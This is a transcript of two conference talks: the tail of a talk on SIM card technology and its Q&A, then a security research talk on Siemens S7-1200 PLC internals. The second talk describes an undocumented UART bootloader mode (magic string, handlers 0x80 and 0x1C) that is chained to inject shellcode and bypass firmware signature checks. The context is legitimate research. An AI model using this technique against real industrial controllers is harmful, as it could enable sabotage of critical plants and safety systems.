You need some kind of new transport channel of how to talk to the SIM card and in release 9, they came up with something called over the air over HTTPS, which is specified in global platform 2.2 amendment B and you have to get that specific amendment as a separate document, it's at least free of charge. And actually it uses HTTP, okay, so nice and good. And then it uses something PSK TLS that I've never heard of before, so pre-shared keys with TLS. I mean, I'm not a TLS expert, as you can probably guess, but I don't think anyone ever like, with normal like browsers and so on would want to use pre-shared keys. But it exists in the specs and there's several different cipher modes that I've listed here, which are permitted for over the air over HTTPS, which of those or which subset to use is, of course, up to the operator because it's his SIM card talking to his server so they can do whatever they want there. The interesting part is that the IP and the TCP is terminated in the phone and then whatever is inside the TCP stream gets passed to the card, which implements the TLS and the HTTP inside and then inside HTTP, you actually have hex string representations of the APD use that the card normally processes. So you have this very interesting stack of different technologies and if you look at how exactly they use HTTP, you ask yourself, why did they bother with HTTP in the first place if they modified it beyond recognition? But we'll see. So the way how this is implemented interestingly is that the card implements an HTTP client that performs HTTP post and the APD, so your card somehow by some external mechanism gets triggered. So you must connect to your management server now because the management server wants something from you and then the card does an HTTP post over TLS with pre-shared keys to the management server and then in the post response, there is a hex encoded APD for the card to be executed by the card. And then you have tons of additional HTTP headers. I'm not going to explain. Well, the CRLF is just a copy and paste error, but yeah, you see there is like what all kinds of X admin headers and it will completely not work with normal HTTP. So why use HTTP in a context I don't really know. Yeah, I thought I had an example here, but I didn't put it, thought it's too much detail. But in the end, if you look at this, yeah, I mean, you need to write your own HTTP server or heavily modify it anyway and the card, well, yeah. Okay. But you have HTTP in there. Well, okay. Another technology, sort of random, I didn't really know where to put it in terms of ordering is this SAT technology, which is something really strange that's specified outside all of these specification bodies that I mentioned before. It's another, I'm just mentioning it because it's another vector that has more recently been exploited, another vulnerability where actually, let's say, you don't want to run, you don't want to write a Java application to run on the card, but you still want to use sim toolkit. So your card, most likely inside a Java VM, implements a VM for another byte code, which is this SAT byte code, which gets basically pushed from the server into the card. So the card can then instruct your phone to display some menu to you. It's like, hmm, okay. Very exciting technology. I'm sure there was a use case for it at some point. I haven't really figured it out. So there is something called an SAT browser, which runs inside the card. As I said, most likely that browser is implemented in Java, running inside the Java VM. It's not a web browser, of course. It just called a browser and it parses this binary format, which then creates some sim toolkit menus or whatever. So yeah, I haven't really looked into detail. It's too strange even to look at it. But not least, we have something called the eSIM, which many people may know as a particular, how can I say, particularly dominant in the Apple universe, where the sim card is no longer a replaceable or exchangeable plastic card with contacts, but it's actually sold into the device. This package form factor is called MFF2, the machine form factor. Not sure why it's two. I've never seen a one before. And it's a very small, like, 8-pin package, SMD package that gets sold on a circuit board. And of course, at that point, you have to have some mechanism by which the actual profile, meaning the user identity, the keys, and all the configuration parameters and so on, can be updated or replaced remotely. And that in a way, that will work between different operators which are competing in the industry and which don't really want to replace those profiles, at least not inherently. And this is why this is managed by the GSMA as an umbrella or entity of all the operators. And it specifies an amazing number of acronyms. And trust me, if I say that, it is an amazing number of acronyms on how the cryptography and how the different entities and how the different interfaces work and all the different roles and the parties and each implementation and each party needs to be certified and approved and so on and so on. And in the end, you have a system by which, after a letter of approval between operators, a new identity from a new operator can be downloaded in the card in a cryptographically secure way. So at least is the intent of the specification. I am not the person to judge on that and replace the profile. But it's not that you as the owner of the device can do that, but it's just all the operators that are part of the club and are approved and certified by GSMA can actually add and or remove profiles and thus facilitate the transition from operator A to operator B in those cards. They don't only exist in this solder form factor, you can also actually buy plastic cards that allow that, it's mostly used in like IoT devices, which I still call machine to machine, the old marketing term for that. So some random cellular interconnected device that you want to remotely update. And as a final slide, the CC event SIM cards that are around here, if you use the cellular networks, they are Java SIM and use SIM cards. They support over the air, not the random update, but the remote application management, the remote file management, at least via SMSPP. Haven't tested anything else. They for sure do not support HTTPS yet. And if you're interested in playing with any of that and writing your own Java applets, there's even a Hello World one around for several years that you can use as a starting point. You can get the keys for your specific card from the GSM team and then you can play with all of this in a way that normally only the operator can do with the card. Some hyperlinks, which are actual hyperlinks on those slides, so you have to look at the PDF to see them. Yeah, and that brings me to the last slide. I'm very happy to see questions. Thanks. Thank you, thank you so much. Actually talks like this one is one of the main reasons I go to Congress because sometimes I just take a dive into a topic I know nothing about and it's presented by a person with literally decades of experience in the field. So it's amazing. And we have time for questions, so keep them coming. And the first one is microphone number four. What you say makes me want to have a firewall between my phone and my SIM card. Is there a firewall? Not to my knowledge really. I mean, there are some vendors of specifically secure telephones that say, well, we have a firewall sort of built in, not sure to what extent and what detail, but not as a separate product or a separate device. At some time, people developed so-called interposer SIM cards, which you can slide between the SIM card and the phone, but that doesn't really work with nano SIM cards and so on anymore. And those interposers were mostly used to avoid SIM locking and so on. But of course, with such a device, you could of course implement a firewall. Keep in mind that almost all of the communication, I mean, the OTA may be encrypted, but all of the communication between the phone and the card is completely unauthenticated or unencrypted. So you can actually intercept and modify that as much as you want. And there's actually a project I forgot to mention in more detail. There's an Osmo-com project called SIM Trace, which is a device that you can actually put as a man in the middle to trace the communication between card and phone. Thank you. Mike Wan. Could you please elaborate a little bit about the SIM checker attack? Because the telephone provider said it's only possible if you have the SAT browser on the SIM card, and most claims they don't have. So do you have a feeling how many of the SIM cards have a SAT browser and which are attackable or which other applications are attackable by the SIM checker attack? I'm not involved in those attacks. I cannot really comment on that in detail. But I know there is a tool available, an open source tool that is made available by SR Labs, which allows you to test cards. So if you want to check different cards, you can use that SIM tester. I think it's linked from the slide here. The SR Labs SIM tester, it's a Java application. I don't have any figures or knowledge about this in terms of the figures you're asking for. Sorry. Thank you. Let's take a question from the internet next. Hi, internet people. There was a question. Can the eSIM be seen as back to the rules, especially compared to what the US market had in the early time? That refers to the situation that the identity is hardwired into the phone and not replaceable. And I think no, not really. Because it can be replaced and it can be replaced by any of the operate, like the normal commercial operators. Of course, it means you cannot use such a device in, let's say, a private GSM network or in a campus network for 5G, which apparently everybody needs these days now. So there are limitations for such use cases. But in terms of the normal phones switching between operator A and operator B, that's exactly what the system is trying to solve. It's just that if you're not part of the club, you've lost. Thank you. The person behind mic 5 has a very nice hat and we're all about fashion here. So the next question goes to you. Nobody told me that. This is a cow's mentor said, not a Google one. And my question was just answered, I think, because I wanted to know what prevents a Pock from providing an eSIM. A profile for an eSIM, yes. That's exactly the problem that it needs in order to install it. It needs to be approved and signed and so on and so on. And you need to be part of that GSM process. So first of all, you would have to technically implement all of that, which is doable and all the specs are public. But then you need to get it certified, which is maybe less doable. And then finally, since you're not a GSM member and not an operator, you cannot become a GSM member and you don't have the funds for it anyway. So that is certainly not going to work. But the Pock could provide an actual like a physical eSIM chip. So if somebody wants to do hot air rework, that's easy. And I mean, you can buy them just like other SIM cards and then you have your identity inside. But of course, that doesn't really solve your problem, I suppose. Thank you. No more people in cool hats. So we'll keep picking a random. Mike Seven, please. Thanks for the amazing talk. I have a question about the flash file system on the cards. I've already worked with the cards on the file system level and you for some files, you need to specify these. You need to do like an authentication tango, provide the CHV like the pin one, and then you only have access to some of the files. And since cheap flash is built into those devices, my question is whether there are cheap hardware or software tricks to access the files or modify the files which are usually locked behind the pin. Not that I'm aware of. And if I would say they are rather specific to the given OS or whatever on the cards and there's so many out there. So I think it's unlikely in terms of write cycles, you can typically buy between 100,000 and 500,000 write cycle flash in SIM card chips. That's sort of what the industry sells. But then of course you have all kinds of ware leveling and then there are algorithms and SIM card operating systems even go as far as to like you can specify which files are more like the update frequency. So it will use different algorithms for managing the flash ware. But an interesting anecdote for that if we have the minute. I was involved in OpenMoco. Some people may remember that it was an open source smartphone in 2007. And there actually we had a bug in the baseband which would constantly keep rewriting some files on the flash of the SIM card. And actually we had some early adopters, users where the SIM cards got broken basically by constantly hammering them with write access. So yeah, but nothing that I know about any kind of access class bypass or something like that. Thank you. Microphone 6 which I often neglect because the lights are blinding me when I walk that way. Thanks for the helpful talk. I have a two-fold question. So if I understand correctly your talk, it's impossible to know the code that's running on the SIM right. So this two-fold question is about going further. Is there something better than the specs to understand more concretely those protocols? And is there any way to dump the code that's running on the SIMs? In terms of documentation beyond the specs, there is one document that I always like very much to recommend which is also leaked here. It's the so-called SIM Alliance stepping stones. No idea why it's called that way but that's how it's called. There's a hyperlink so if you work on the slides you can download it. That's a rather nice overview document about all the different specs and how it ties together. So I can recommend that in terms of tools to dump the code on the SIM card. Yes, of course, tools exist but those tools are highly specific to the given smart card operating system and or chip. And I'm not aware of any such tools ever having leaked. I get such tools for the cards that I, in the company that I work with. But yeah, of course, the SIM cards out in the field should be locked down from such tools and they are highly specific to the given OS and SIM. Okay, thank you. So maybe one addition to that. It's normally made in a way that basically if you want to sort of reset the card or something like that, once the card is in the operational life cycle state, which is when you use it normally, if you ever want to bypass some restriction or you want to sort of do something that is not permitted by the permissions anymore, you have to sort of recycle the card and get it back into the so-called personalization life cycle state. And most often that is done with a complete wipe at least of the file system or with a complete wipe of the operating system. So you back to the boot loader of the card and then you can basically start to recreate the card. But it's typically implemented in a way that it always is together with an erase. So they tried at least to make it safe. Oh, there's a question there, but not at the microphone. Oh, there is a microphone. Oh, sorry. But yeah, your job. Sorry. Yeah, I think the person behind mic four has been standing there for ages. You mentioned that the card can instruct the phone to open a website, but I've never seen this and I've seen use cases where I think it would be useful to do this. So is this not supported in most OSs or why? It's a good question. Actually, if you read all those specs, like especially these proactive SIM specs and so on, I always have the impression, okay, it's all very interesting, but I've never seen anything like that anywhere. So I completely agree with you. Whether or not it's supported by the phones is a good question. And I think without trying, there's no way to know. So you would actually have to write a small, like, send the Hello World app and to do that and see how to do testing with various phones. I would fear that since it's a feature that's specified but rarely used, a lot of devices will not support it or not support it properly because it's never tested because nobody has ever asked about testing it. But that's just my guess. Thank you. Mic one. Okay. Hello. My question is when you have an eSIM and you want to provisioning it, could you be done with tier 069 or something similar? No. There's a completely different set of protocols that are used for that and that relates to this global platform 2.2 NXP. I think it was. Yeah, I don't find it right now. But there's this spec and that specifies all the different interfaces and protocols that are used between the elements and it's completely different. I think also the requirements are very different because you have these multiple stakeholders. So you have the original card issuer, the original operator, then you have other operators and it's not like a single entity that just wants to provision its devices. But it's sort of a multi-stakeholder approach where you want to make sure that even in, like, a competition between operators still this is possible and that people put trust in the system that even if the original issuing operator doesn't like the other operator, it still will work and it will even work in 10 years from now or something when it's in the field. So I think the requirements are different. Thank you. That was the last question of the last talks of the day. Luckily not the last day. Not the last day, the first day. So there's three more days ahead of us. Thank you. Thank you. Thank you.
Billions of subscribers use SIM cards in their phones. Yet, outside a relatively small circle, information about SIM card technology is not widely known. This talk aims to be an in-depth technical overview. Today, billions of subscribers use SIM cards in their phones. Yet, outside a relatively small circle, information about SIM card technology is not widely known. If at all, people know that once upon a time, they were storing phone books on SIM cards. Every so often there are some IT security news about SIM card vulnerabilities, and SIM card based attacks on subscribers. Let's have a look at SIM card technology during the past almost 30 years and cover topics like Quick intro to ISO7816 smart cards SIM card hardware, operating system, applications SIM card related specification bodies, industry, processes from SIM to UICC, USIM, ISIM and more SIM toolkit, proactive SIM eSIM
10.5446/53174 (DOI)
So, Siemens recently decided to add some security features to their PLC and today we have Tobias and Ali and they will be sort of telling us what they managed to find this PLC. They both come from Rur University Bohum. Tobias is a recent acquisition as a doctoral student and Ali is a postdoc. So, let's give them a hand. Welcome to our talk. A deep dive into our code execution in Siemens PLCs. My name is Ali Abassi and as mentioned before, I'm a postdoc at the security at Rur University Bohum and here is my colleague. I'm Tobias or Tobias. I'm very glad to be here. It's my fifth time at the Congress and I'm finally able to give back in a way so I'm very excited about that. So, let's get into it. So, first about the plan of the talk. We want to give you a little bit of a background of what PLCs, which is program logic controllers, are all about. Why we might want to use them in what kind of setting and then we want to go into the specifics of PLCs in the Siemens case. First, we look a bit about at the hardware and then at the software afterwards and the different findings that we had. At the end, we will show a demonstration of what we were able to achieve and conclude with some remarks. So, first of all, process automation. So, we all know it or maybe we do it ourselves or we know somebody who does it. We put in some devices in our smart home if we call it smart already and we try to automate different targets or different things to make our lives easier. Things like turning up and down the heat. We might not want to do that our own. We might not want to overheat or under heat and what we do is basically have some sensory systems inside our homes as well as some devices that interact with those sensors. In this case, we might have a thermostat and a heater and we want to adjust our temperature based on the thermostat. There are pretty simplistic solutions like this for smart home. But what we do if we have very complex control loops, for example. Here we can see on the left bottom corner a pretty complex looking picture. I'm operating a operator sitting in front of what we call an HMI, a human machine interface, which is basically an aggregation of all the information of things that go on in a factory, for example. We need different sensors in this factory and we need to steer different motors and stuff like this. So we need things in the middle to kind of control all of this. And we do this using PLCs. Here we can see a setup, how it could look like. So basically have a set of inputs as we talked about and a set of outputs and we have some logic going on in the middle. And what we typically deploy is a PLC, a programmable logic controller and some logic in the middle. There are different technologies that can be used. For example, structure text or letter logic which gets downloaded onto the PLC and then which steers outputs based on the inputs it gets. Here we can see some applications of this kind of thing. For example, a chemical plant, an electric grid or some manufacturing. All of those components are pretty critical to the workings. Even either we see it in our everyday lives and sometimes we don't really see it but they are steering everything in the background. And we really don't want those systems to get compromised. For example, if you went on to Google and looked something about disasters and chemical plants, you could see some meltdown plant just because of some mis malfunction in the system or so. And we really don't want this to happen neither on accidental but also not on malicious basis. And this is why we want to secure all the processes going on in factories and the like. We've seen some of the recent attacks. So it started kind of in 1999 with the first initial reconnaissance base mainly and then we had some more advanced attacks in 2010, for example, where we saw Stuxnet which was very much a really intricate operation. If you think about it on technical level, what all went into it, what different skill sets were involved, it's pretty impressive. And then in the more recent time we had some issues in the Ukrainian power grid, which in 2015 and 16 just before Christmas some lights went out for quite a while in some cities there. So quite a bit of impact. So to give you a bit of impact background on Siemens PLCs here, when it comes to market shares we can see that together with Rockwell Automation Siemens actually has more than 50% market share in the market. And obviously if we take some devices that introduce some security, it would be interesting to look at those with the biggest market share. This is what we did here in the Siemens case. Here we can see the actual PLC that we will focus on in this talk, which is the Siemens S7-1200 PLC. It's one of the smaller PLCs, not quite the smallest. There is the logo as well, which is more of a playing around example. But this is the one that it's still pretty accessible to researchers in terms of costs. So it's like 250 for the PLC. Then if you need a power supply it can add the same. So as long as you don't break too many, spoiler, we broke quite some, or you don't drop them or something like this, then you're pretty fine. So you can kind of get the resources to play with those devices. We have different applications and we talked about them before. So here is what an unboxing of a Siemens S7-1200 PLC would look like. We have the top view here. In the left picture it's only one of different PCBs, which are layered onto each other in this case. But the real magic goes on in the top PCB, which is the green one that we see here. Looking at it a bit more in more detail, we have the top view on the left side, which shows the different components that really make the PLC tick. For example, the ARM CPU that we have, or different input outputs that we can connect to PLC, as we talked about before, which they need in order to see the different parts of the system. And then we have the flash chip on the top side as well, which is a bigger flash chip holding the firmware of the actual PLC, which we will talk about a bit more in detail later. On the flip side we have on the right picture the bottom side of the first layer PCB. And as we can see here, this is where the boot loader chip resides, which is an SPI flash chip of four megabytes holding the code of the Siemens PLC boot loader. Here we wanted to have a detailed view on what the actual processing unit on this board actually looks like. And what you can do if you really want to find out, you can do some decapping. And this is what we see here. The result of this, we can see that at the core of it is a ReneSys ARM Cortex R4 from 2010. And if you afterwards are more juggling with the software side of things, you may also want to find out the actual revision number, what it supports inside the ARM standard. And what you can do there is use a special instruction which resides in the ARM instruction set. And you can decode the different bits on it, which we did here, which you can see here for reference. So if you really want to know what's going on, you can take apart those bits and make sure you're actually working with the hardware that you expect to be working with. So here's where we come to the memory part of the hardware, and this is where I leave you with your work to Ali. Thanks. Now that the Tobias like unboxed the PLC for us, now I'm going to talk about quirks and features in the PLC. So as mentioned before, it's a Cortex R4, revision three. It's a big instruction set, and it's also only have MPU, so there is no virtual memory, basically. There are multiple RAM sizes depending on which year you bought it or which variant of this, 71200 UB. And also multiple SPI flash and multiple different types of LAN flashes. The most significant one difference is like in the RAM, which sometimes they use BingBong, and sometimes they use micro technologies, recently at least micro technologies RAM. It's a LPDDR1 RAM. We do expect the SPI flash for bootloader. So it's again depending on the variance between 1 to 4 megabytes SPI flash. It contains different banks of each size, 512 Pubytes. And basically what the bootloader does is that beside the typical actions of the bootloader, which is like configuring the hardware, is like verifying the integrity of the framework before it being loaded. So we actually did some X-ray tomography of the PLC. So it's basically 3D, so the PCB is basically rotating here because we wanted to also do some hardware reverse engineering part. And somebody in university had something, so we didn't have to go to our dentist for X-ray. So here is like a quick 15 minutes X-ray, which is not that good. But once you go in deep, eventually what you will have is like this. And you can actually just, it's like a software animation. You can go inside PCB and see all layers. It's like amazing. So it's a 4-PCB layer. And so beside VCC and GND, there are two layers of PCB connection basically. So let's look at the startup process. Again, startup as usual. Some hardware configuration happens. So vector interrupt controller, for example, like lots of these handlers for different modes in ARM. And then CRC checks some of the bootloader itself, which is easily bypassable because you can just overwrite the CRC. Then the bootloader, especially in the 2017-2018 variant of the Siemens PLC, allows you to overwrite the SPI flash. And also eventually check the CRC checks some of the framework before basically loading it. The size of the bootloader itself is like 128 qubit. It's really even less than that because half of it is just like 0xFF. Siemens multiple times changed. There are different versions. I think in two years we saw like three variants or four variants of the bootloader. So it was evolving. It was not something that everybody forgotten about. So generally, as mentioned, so you have the first stage of hardware initialization. And then basically bringing the bootloader to the RAM and basically checking the bootloader CRC checks some. So make sure that it's not manipulated, which again, easily can be bypassed. And then a second stage of the hardware initialization happens. And then at this moment, it waits for a specific command for half a second. And if it received this command, it goes to another mode, which we'll discuss later. Otherwise, it basically prepares some CRC checks on table for the framework. And then it tries to load the framework and then eventually it just removes the memory barrier, the SY instruction, those who know it's about ARM, and basically map the framework to the memory. So the name of the operating system, it was not mentioned before. It's Adonis. We know it from different ways, actually. So first, in the references in the framework, we see lots of references to Adonis, but that was not enough for us. So we actually looked around to see if there is any reference to it. And well, LinkedIn is one good open source. And here is one employee actually talk about a Siemens developer who talk about working in Adonis. And that's why he put Windows and Linux beside on this. But he says that he worked on this. And so it was not enough for us. So maybe it's some OS we don't know. And we look again, further and further, and we find this thing which was the best indicator. So a Siemens developer engineer mentioned that he worked on a kernel software development for Adonis real-time operating system, which is a good sign for us. It means that we are right. So now that we know about the naming, and we're sure about that, let's look at the components. So it's actually a start in basically 440. And basically then initializing the kernel. And then lots of routines for initializing different components of the operating system. I don't think Siemens actually generalize it in this way. We don't have such a thing in the framework, but we actually did it like that. So we generalize it to two groups. Some of them are core services like Adonis real-time operating system services, and some of them are related to the automation part. So those people who are in the automation part, like writing, ladder logic, and stuff like that, those commands on function codes which are available in Siemens, they actually know. These are more automated related services. So you have profanet AWP, or automated web programming, MC7 Git parser basically for their ladder logic or different kind of SDE, like basically their own Git compiler inside the PLC. And you also have the OMS, this configuration system, which is very related again to the automation part, core part of the automation system. And of course, alarm, central IO, and stuff like that related to automation. In the operating system part, so lots of these usual things. So file system, so PDCFS, which Tobias talks later about it, the TCP IP stack, some C++ libraries which is not from Siemens, it's from Dinkonware, and mini web web server, MWSL parser, or mini web scripting language parser, and lots of different subcomponents which is usual in operating system, like any operating system you can find them. Also, there are some references to core site. I don't know how many of you know core site or how much you work on ARM, but basically core site is something similar to Intel process tracing or Intel PT for tracing applications, and can be used for getting code coverage, for example. And the hardware part is very well documented by Thomas Weber in this year, it's not yet ended this year, so this year, black at Asia. But I have to warn you, because I received some emails, some people ask about that. If you connect to it, the PLC have some anti-debugging feature, which detects it's being debugged via JTAG, and overwrite the NAND flash with random stuff, so you break the PLC. So just connect it to your own risk. Next is, let's look at the core site just quickly. Core site basically have like, before I go here, I have to mention that Ralph Philipp also have a good talk in Zero Nights about core site tracing, so I would recommend you guys go look at that as well. But generally core site have like, three major parts or components, sources, links, and sinks. And sinks is basically the part which you actually get the tracing information, and sources are the part which you tell, it's a feature in the CPU which you ask what kind of sources you want to get the data from. And then links basically convert these sources. I have to mention that like, it's very useful for fuzzing as well too. I guess some people, very few, but some people are working on that things, on coverage guided fuzzing via core site, ARM core site, as always possible. Similar implementation has happened in Intel PT, for example KFL, VineFL, or HUNFuzz. So sources basically have like, three different components, STM, PTM, ETM. ETM version four is the latest version of it. And basically you have also links which connects different sources to different like, different or single sources to different or single basically sinks. And then you have funnels for core sites. Sorry, sinks, sorry. You have sinks, which is basically different kind. So there are some integrated to the CPU, which is four kilobytes ring buffer SRAM, or you have like, system memory or even TPIU, or just for example JTAG DP port, high speed JTAG port. So now that's a clear thing, like the core site. We actually create a seven for existence of core site. And as you can see like, in the software part, it's already implemented. So they actually have some references in their software that are utilizing or configuring the core site in their PLCs. And basically we can see that the ETM version is not the latest version, it's ETM version three. Now that I talked about core site, Toby can talk about framework dumps. So let's get to something that I'm very much more familiar with and feels easier for me to handle. It's firmware dumps or software in general, but firmware dumps, I think it's closest you can get to what I like when talking to a PLC or trying to understand a PLC. So in the Siemens case, we have a 13 megabytes binary. And at the beginning it's not as many, but if you twiddle around with it a bit and apply some IDA Python functions and stuff like this, you can get to like 84,000 functions, which is not something you want to really look at everything manually. Also like 84,000 function firmware image doesn't really get the sexiest firmware on planet, but this is what I looked at and what we will look at a bit more in the next couple of minutes or so. As you can see, we have different names up there. We have one name which is called sum gets sum meg size. So this is my internal way of saying I don't really have an idea of what's really going on in this function, but we can also see some more meaningful functions. So we understood some parts a bit more, some parts a bit less, but I gave it a cursory look in most places. So now let's get into a lot of address related stuff. So we extracted a lot of details which are very interesting if you start looking at firmware code and I will explain along the way why they might be interesting. So first of all, what you have to know is that Cortex R4 gives you a banked register. This is basically a feature that's implemented to lower software overhead and allow more seamless mode switches for the internal CPU. And what we get is banked stacks per execution mode. So if we want to know what is kind of going on in the state of the firmware at a given point, we may want to look at the different stacks of the different modes at any given point. And this is the addresses that we extracted for this and you could use that as a starting point if you started reverse engineering things like that. Now we will have some tables with addresses and the first one is RAM mappings which show you what kind of functionality or what you might expect when looking at firmware code which is interfacing with different parts of memory. So if you initially go and look at some ARM code, you may just see a random access to some place in memory and you may want to know what it's actually doing. And it looks very uneventful if it's just an address and it gets curated and you don't really know what's going on. So for example, if you looked at an address within the text section, you would expect there to reside code. If you wanted to see some global static data, you would want to look at the data or the BSS section. And then finally, if you wanted to look at heap memory, look how chunks are set up there, you would look in the uninitialized section and it goes on like this for different sections. Another very interesting thing to look at if you try to reverse engineer firmware images is that you kind of want to know what the hardware is that a given piece of code is interfacing with. And in this case, we dumped some regions or reverse engineered what some regions are for what is called memory map dial. And the way ARM is talking to firmware is basically to query a magic value inside the address space and then it gets something back which is not at all what has been written there before. So it's basically an address which gets wired through to the peripheral, the hardware peripheral on the same system on a chip. And here we can see that we have different hardware peripherals residing on it. For example, we can talk to the Siemens PLC via different serial protocols. And those protocols might be SPI or I2C. And then we have on the left side kind of in the middle top part of it have some region pertaining to that. And then if you saw some other code talking to timers, for example, you would know you are in Timerland at the moment or like in the scheduler or whatever it would be. Finally, we have some MPU configurations which are memory protection unit configurations that we introduced earlier. So what we can see is that Siemens is actually applying some of those configurations to protect parts of memory. What we can see, for example, is whenever the XN, so the execute never bit is set, code is not to be executed within this address region or we have a read only region, we really don't want to have it overwritten. So it's interesting that they started playing this in practice. Here we can see what actually happens when the firmware itself boots up. So it turns out the firmware doesn't really want to depend too much on what the bootloader did. Probably it's different teams doing different things. And to keep this interface as small as possible, they kind of redo some of the stuff that the bootloader code also does. It sets up the vector table for handling interrupts and similar things like that. Then if we get past this initial stage, we actually want to boot the Adonis kernel, which Ali talked about before. So first of all, there is an array of function pointers that gets called, one for like every piece of functionality that we saw in this overview of the different components of Adonis. So if you wanted to look at what kind of components are there or functional components are there, this is a very interesting list of functions, function handlers to examine. It also sets up some management structures and stuff like this. A typical operating system would have to set up. So now we look at more of the different components of Adonis. First one is the file system. So PLC's part of the specifications. Sometimes it's how resilient is it against temperatures. How low of a temperature can I have this PLC reside in without losing functionality. And in this case, what they also want to provide is some safety against interrupts in power supply. So they developed a proprietary file system which is called Powered-on Consistency File System, which they implement in the firmware. And we can also see one of the work experience entries of one of the previous Siemens employees who stated that he or she worked on this file system. We have another very critical part of the functionality. Of course, we want to talk to the PLC. It wants to talk to us. And one of the ways is obviously TCP IP. And this is to expose the web server, for example, and different other components. And in this case, it turns out that Siemens doesn't implement their own, which probably is a good idea not to do that. They use inter-niche technologies, the TCP IP stack in version 3.1. If you are good at Googling, you can find some source code and you can actually map this to the firmware and how it works. So it could give you some wrapper functions, something like creating sockets and stuff like this. And it could make it easier for you to find those in the firmware image. We also have one of the very critical components of each firmware is updates. If it allows an update, and the Siemens PLC allows updates, there are different modes. One of the modes is just you drag and drop a UPD file and update file to the web server and it will start checking firmware integrity and signatures and so on. And the second way is doing it via NSD card, which has a great total of 24 megabytes. And for the low price of 250 euros, you can get it. Thank you. Can it really beat that ratio? If you actually decompress this kind of UPD file, you get another representation of it in memory. And we did some reverse engineering on that and we have different fields. I'm not sure if you can see them now, but you can expect what it is. It's different offsets into the actual binary file. It's an entry point into the firmware magic header to make sure something is not too screwed up and CRCO or the whole thing, for example. We also extracted some of the addresses inside the firmware image, which help you find the first foothold into what the logic is dealing with and give you some addresses for you to refer this to later. The next component that we want to touch on is Minweb, which is the web server. It kind of exposes to you the different internal parts of the PLC and what the state of different GPIOs, general purpose input outputs is, the inputs and the outputs and what the health of the PLC is itself and the way that it exposes this is using the MWSL language, Minweb scripting language. As we will see over the next slide, I will talk about that in a little bit more detail. We have it be started as a service as well from one of the function handlers of the initialization functions that I referred to a little bit before. Now let's get to some undocumented HTTP handlers, which I think are very interesting. I think my favorites are Lili-Lili-Lili and Lolo-Lolo-Lolo. If you put those together in a clever way, maybe somebody is musically gifted and can make a song out of it, I would be very interested to hear that. So now let's get to the MWSL, the Minweb scripting language. It basically exposes the internal functionality by allowing you to inject into an HTML page via templating different configuration parameters and stuff like this. For example, as we can see here on the top right corner, you can see the CPU load of the system at a given time. It doesn't really seem to perform any output encoding, so it kind of trusting what comes out. So there may be clever ways to do some web-related trickery with this. Also, the parsing of this tokenization is kind of complex. We looked into it a bit, and this implementation could also be interesting to look at, but we will get to those kinds of aspects a bit later. With this, we want to get to our actual findings and talk about those a bit more, and this is where Ali will take over. Thanks, Toby. So now we talk about the capabilities which exist in the bootloader, which allows us to have unconstrained code execution. So basically this feature is available in the UART, so you need physical access to the device. But once you have this physical access, you can basically, as Toby later described, we can actually bypass the security ecosystem which developed by Siemens in their product. So you need UART access. As it's documented here, you have TX, RX, and GND in the PLC. And the UART actually in previous research was documented as well. Every address which I'm talking about here or mentioned in this presentation are for bootloader version 4.2.1. As I mentioned earlier, Siemens actively modified their bootloader. So I think in two years, we saw like two, three modifications or different versions of their bootloader coming up. So this exactly is based on that half a second waiting for a specific command after a second hardware configuration happens. It applies to Siemens S7-1200, including C++, and S7-200, smart. Actually, somebody from Kaspersky, ICS Security mentioned it. We didn't know even about it. We just investigated S7-1200, but Siemens later updated the advisory that it also applies to other products as well. So let's talk about this special access feature. So as we mentioned, one of the things bootloader does is actually initialize the hardware. After this hardware, it's basically copy some of the contents of the bootloader itself to a memory segment called IRAM, basically. And then PLC basically waits half a second for a specific command. And once it receives this specific command, it responds with a specific string. And it's all happening over the UR. So if you send a magical string, MFGT, sorry for my broken German, but probably it means mid-fondition, Großen. Oh, I did it right. And then the PLC responds with dash CPU and says that now you are in this special access mode. I am waiting for your commands. And these addresses are also available at 0xEDF8 in the bootloader. So here is a decoding of our clients, which we'll release later next year, actually, which you see that 2D435055, which is dash CPU response from the PLC. So now we are in it. And also we also added some extra thing about your packet format, somebody asked before. So once you send this command, you get lots of functionalities. Here in this presentation, we call them handlers. And basically there are some things we call primarily handlers. It's like 128 entries. And there are some three other separated handlers, which are like 0xAT. You are configuration and buy. So in the primarily handlers, there are lots of things. So if you go back to the two previous slides, I got the frameware version here, 423. And basically what is happening is that basically it's this command here, get bootloader version. We are just requesting the via special access feature to tell us what is the bootloader version. And also you can do lots of low level diagnostic functionalities happening there. Also some functionalities related to frameware updates happening there, which bypasses the usual cryptographic verification of the frameware. And it doesn't need that. So let's look at them because for this work, which we are talking about, we actually primarily only use two of the handlers. We don't look at, or we don't discuss now, all others 128 handlers which exist in the PLC. So it works. One of the handlers, the interesting one for us, was handlers 0xAT, which mentioned here, update, not function. So basically what it does is that it lets you allow you to write to a specific part of the memory IRAM, which previously copied some content of the bootloader. So basically you send this handler after this handshake. You have to do this MFGT1 and then CPU. And then basically you are going to send this handler. And then it basically checks because each handler might have different requirements, check number of arguments, for example, and then you are in this update function mode. And then you have to provide target ID because there are four sub-functionality available once you enter this mode. And some of them are like for IRAM, for SPI or IOC, or for Flash. And then for each of them you have to choose what kind of operation you want to do. You want to config, read, write, or check. And so you can do all of these things. So you can read and write to the IRAM. Basically this is a function handler 0xAT. Next is a primary handler like 0x1C. This is listed in this handler list here. So basically it allows you to call functions. So basically these functions are listed in the IRAM. And basically what you do is that you send this handshake. You are in this 0x1C handler and then you can call the ID number of the handlers which you want to use. So here you have lots of handlers available for 0x1C. So the question is what we can do with it. And before I ask Tobias, I want to ask anybody here if you have any idea. Trace. Trace. Somebody said trace. I don't know what that means. Just look what is happening on the controller. Okay. You mean with the core site? No. We are not going to use that. So let's ask Tobias what he can do. Yeah. So looking at it dynamically and seeing what it does with the memory is, I guess, a good idea in general. If static reverse engineering doesn't give you anything. In this case we looked through different, or I looked through different of those functions and tried to see what can I do with it. So the base of where I started looking for this special access feature was basically that I saw there is too much in this code going on. I kind of feel like I understood what it should be doing, the bootloader, what it should be doing. But it seemed just to be too much. The way we can combine those two functions is basically to recap, use this OX1C handler which gives us control over what kind of secondary list functions are to be called. Which, as we saw before, is copied during the bootup process to a position in IRM from actual read-only memory. And this exposes this function handler table to anything that can write to IRM. And as we learned before, the OX80 handler is able to, in a limited capacity, do just that. And here we can see what we can try to do with this. So if we use in the first stage the OX80 handler to write to IRM, we can actually inject another function pointer together with some configuration values that allows us to pass different checks about argument sizes and stuff like this. We can inject this as an entry into this table. And we can also write to this table a payload which we can use as a shellcode. And then in the second stage we can use this previously injected index that we specified just as a trigger to call our own payload. So now we have code execution in the context of the bootloader, which is as privileged as we can get at that point. And we can see what we can play around with this. And as a little summary is that we chain all this 